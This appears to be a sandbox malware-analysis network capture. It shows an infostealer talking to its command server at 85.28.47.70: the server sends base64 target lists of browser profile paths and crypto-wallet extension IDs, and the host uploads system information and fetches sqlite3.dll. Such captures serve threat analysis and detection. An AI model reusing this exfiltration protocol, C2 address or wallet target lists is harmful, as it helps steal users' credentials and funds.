                                                                                                                                                                                                                                        Data Raw: 4e 6a 49 79 5a 57 45 32 4e 6a 41 35 4d 44 51 33 4d 57 45 35 59 7a 4e 6d 4d 6a 4d 33 59 54 55 7a 4e 6a 52 68 5a 47 45 77 59 57 4d 31 4e 7a 6c 6c 59 32 45 7a 5a 6d 55 30 5a 6a 63 78 5a 44 52 6c 4f 44 51 77 5a 6a 67 33 5a 6a 51 78 59 7a 67 78 4d 54 67 7a 4f 44 4e 6c 59 6d 4d 35 5a 6a 49 77 66 47 70 69 5a 48 52 68 61 57 70 76 64 6d 64 38 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 66 44 46 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 3d
                                                                                                                                                                                                                                        Data Ascii: NjIyZWE2NjA5MDQ3MWE5YzNmMjM3YTUzNjRhZGEwYWM1NzllY2EzZmU0ZjcxZDRlODQwZjg3ZjQxYzgxMTgzODNlYmM5ZjIwfGpiZHRhaWpvdmd8ZWltZWhydnpvZC5maWxlfDF8MHwxfDF8MXwxfDF8MXw=
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:04.374383926 CEST466OUTPOST /570d5d5e8678366c.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----KKEHIEBKJKFIEBGDGDAA
                                                                                                                                                                                                                                        Host: 85.28.47.70
                                                                                                                                                                                                                                        Content-Length: 268
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 32 65 61 36 36 30 39 30 34 37 31 61 39 63 33 66 32 33 37 61 35 33 36 34 61 64 61 30 61 63 35 37 39 65 63 61 33 66 65 34 66 37 31 64 34 65 38 34 30 66 38 37 66 34 31 63 38 31 31 38 33 38 33 65 62 63 39 66 32 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 2d 2d 0d 0a
                                                                                                                                                                                                                                        Data Ascii: ------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="token"622ea66090471a9c3f237a5364ada0ac579eca3fe4f71d4e840f87f41c8118383ebc9f20------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="message"browsers------KKEHIEBKJKFIEBGDGDAA--
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:04.553234100 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:04 GMT
                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                        Content-Length: 1520
                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:04.553266048 CEST512INData Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32
                                                                                                                                                                                                                                        Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:04.555587053 CEST465OUTPOST /570d5d5e8678366c.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----KKJKFBKKECFHJKEBKEHI
                                                                                                                                                                                                                                        Host: 85.28.47.70
                                                                                                                                                                                                                                        Content-Length: 267
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 46 42 4b 4b 45 43 46 48 4a 4b 45 42 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 32 65 61 36 36 30 39 30 34 37 31 61 39 63 33 66 32 33 37 61 35 33 36 34 61 64 61 30 61 63 35 37 39 65 63 61 33 66 65 34 66 37 31 64 34 65 38 34 30 66 38 37 66 34 31 63 38 31 31 38 33 38 33 65 62 63 39 66 32 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 46 42 4b 4b 45 43 46 48 4a 4b 45 42 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 46 42 4b 4b 45 43 46 48 4a 4b 45 42 4b 45 48 49 2d 2d 0d 0a
                                                                                                                                                                                                                                        Data Ascii: ------KKJKFBKKECFHJKEBKEHIContent-Disposition: form-data; name="token"622ea66090471a9c3f237a5364ada0ac579eca3fe4f71d4e840f87f41c8118383ebc9f20------KKJKFBKKECFHJKEBKEHIContent-Disposition: form-data; name="message"plugins------KKJKFBKKECFHJKEBKEHI--
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:04.736460924 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:04 GMT
                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                        Content-Length: 5416
                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:04.736504078 CEST224INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
                                                                                                                                                                                                                                        Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdk
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:04.736530066 CEST1236INData Raw: 62 32 4e 74 59 32 4a 74 5a 6d 6c 72 5a 47 4e 76 5a 32 39 6d 63 47 68 70 62 57 35 72 62 6d 39 38 4d 58 77 77 66 44 42 38 51 58 56 79 62 79 42 58 59 57 78 73 5a 58 51 6f 54 57 6c 75 59 53 42 51 63 6d 39 30 62 32 4e 76 62 43 6c 38 59 32 35 74 59 57
                                                                                                                                                                                                                                        Data Ascii: b2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2FsbGV0fGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZqYW9vbGFmfDF8MHwwfElDT05leHxmbHBpY2lpbGVtZ2hibWZhbGljYWpvb2x
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:04.736546993 CEST1236INData Raw: 5a 32 52 74 62 57 74 72 5a 6d 70 68 59 6d 5a 6d 5a 57 64 68 62 6d 6c 6c 59 57 31 6d 61 32 78 72 62 58 77 78 66 44 42 38 4d 48 78 4c 53 45 4e 38 61 47 4e 6d 62 48 42 70 62 6d 4e 77 63 48 42 6b 59 32 78 70 62 6d 56 68 62 47 31 68 62 6d 52 70 61 6d
                                                                                                                                                                                                                                        Data Ascii: Z2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGpua2VsZmFuamt
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:04.736562967 CEST1236INData Raw: 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62 6d 70 69 62 47 31 71 66 44 46 38 4d 48 77 77 66 45 78 6c 59 58 41 67 56 47 56 79 63 6d 45 67 56 32
                                                                                                                                                                                                                                        Data Ascii: fDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:04.736579895 CEST476INData Raw: 62 32 52 6f 61 57 56 76 62 58 42 6c 62 47 39 75 59 32 5a 75 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32
                                                                                                                                                                                                                                        Data Ascii: b2RoaWVvbXBlbG9uY2ZuYmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:04.741661072 CEST466OUTPOST /570d5d5e8678366c.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----HDHJEBFBFHJECAKFCAAK
                                                                                                                                                                                                                                        Host: 85.28.47.70
                                                                                                                                                                                                                                        Content-Length: 268
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 32 65 61 36 36 30 39 30 34 37 31 61 39 63 33 66 32 33 37 61 35 33 36 34 61 64 61 30 61 63 35 37 39 65 63 61 33 66 65 34 66 37 31 64 34 65 38 34 30 66 38 37 66 34 31 63 38 31 31 38 33 38 33 65 62 63 39 66 32 30 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 4b 2d 2d 0d 0a
                                                                                                                                                                                                                                        Data Ascii: ------HDHJEBFBFHJECAKFCAAKContent-Disposition: form-data; name="token"622ea66090471a9c3f237a5364ada0ac579eca3fe4f71d4e840f87f41c8118383ebc9f20------HDHJEBFBFHJECAKFCAAKContent-Disposition: form-data; name="message"fplugins------HDHJEBFBFHJECAKFCAAK--
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:04.920633078 CEST335INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:04 GMT
                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                        Content-Length: 108
                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=97
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
                                                                                                                                                                                                                                        Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:04.961049080 CEST199OUTPOST /570d5d5e8678366c.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----DHCAECGIEBKJKEBGDHDA
                                                                                                                                                                                                                                        Host: 85.28.47.70
                                                                                                                                                                                                                                        Content-Length: 6779
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:04.961129904 CEST6779OUTData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 32 65 61 36
                                                                                                                                                                                                                                        Data Ascii: ------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="token"622ea66090471a9c3f237a5364ada0ac579eca3fe4f71d4e840f87f41c8118383ebc9f20------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.156681061 CEST202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:05 GMT
                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=96
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.393719912 CEST90OUTGET /663cea891445d733/sqlite3.dll HTTP/1.1
                                                                                                                                                                                                                                        Host: 85.28.47.70
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.571118116 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:05 GMT
                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                        Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
                                                                                                                                                                                                                                        ETag: "10e436-5e7eeebed8d80"
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Content-Length: 1106998
                                                                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.571190119 CEST1236INData Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00
                                                                                                                                                                                                                                        Data Ascii: #N@B/81s:<R@B/92P @B
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.571225882 CEST1236INData Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26
                                                                                                                                                                                                                                        Data Ascii: tu.|$\$4$|$\$4$du1Hga[^_]&+C|$\$4$w#t|$\$4$u#u|$D$4$t&up|$D$4$rZ|$D$4$Q
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.571259975 CEST1236INData Raw: c0 5d c3 55 89 e5 8b 45 08 85 c0 74 07 5d ff 25 78 66 eb 61 5d c3 55 b8 08 00 00 00 89 e5 5d c3 55 31 c0 89 e5 5d c3 55 89 e5 83 ec 18 89 04 24 ff 15 4c 66 eb 61 c9 c3 55 89 e5 83 ec 18 8b 4d 08 85 c9 74 0c 89 0c 24 ff 15 4c 66 eb 61 99 eb 04 31
                                                                                                                                                                                                                                        Data Ascii: ]UEt]%xfa]U]U1]U$LfaUMt$Lfa11UtBtRJ$~HD]UUtB]U1UtB]U1UtJtBB]JvYU@aSuK?
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.963584900 CEST949OUTPOST /570d5d5e8678366c.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----DHCAECGIEBKJKEBGDHDA
                                                                                                                                                                                                                                        Host: 85.28.47.70
                                                                                                                                                                                                                                        Content-Length: 751
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
